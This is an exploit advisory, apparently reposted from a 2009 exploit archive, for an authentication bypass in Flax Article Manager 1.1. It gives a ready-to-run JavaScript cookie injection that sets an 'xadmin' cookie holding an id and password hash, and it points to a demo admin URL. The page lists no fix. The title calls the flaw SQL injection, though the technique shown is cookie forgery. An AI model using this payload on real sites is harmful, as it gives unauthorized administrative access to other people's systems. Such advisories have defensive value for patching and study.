Flax Article Manager 1.1 (Cookie Bypass) SQL Injection Vulnerability

2009-05-26 19:14:48

---------------------------------------------------------------
---------------------------------------------------------------
Flax Article Manager v1.1 Bypass Cookie SQL Injection Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:www.h4ckf0ru.com
Script:Flaxweb - Article management system v1.1
Download:http://www.articlesitedemo.com/
---------------------------------------------------------------
Exploit
-------
1/ javascript:document.cookie="xadmin=1%2C21232f297a57a5a743894a0e4a801fc3;path=/";
2/ (1%2C21232f297a57a5a743894a0e4a801fc3) is id and password of login to site :)

----------------------------------------------------------------
Dem0
----
http://www.articlesitedemo.com/admin/admin.php
--------------------------------------

Greeting To ALL My Friends (Dz)

#

Fixes

No fixes

In order to submit a new fix you need to be registered.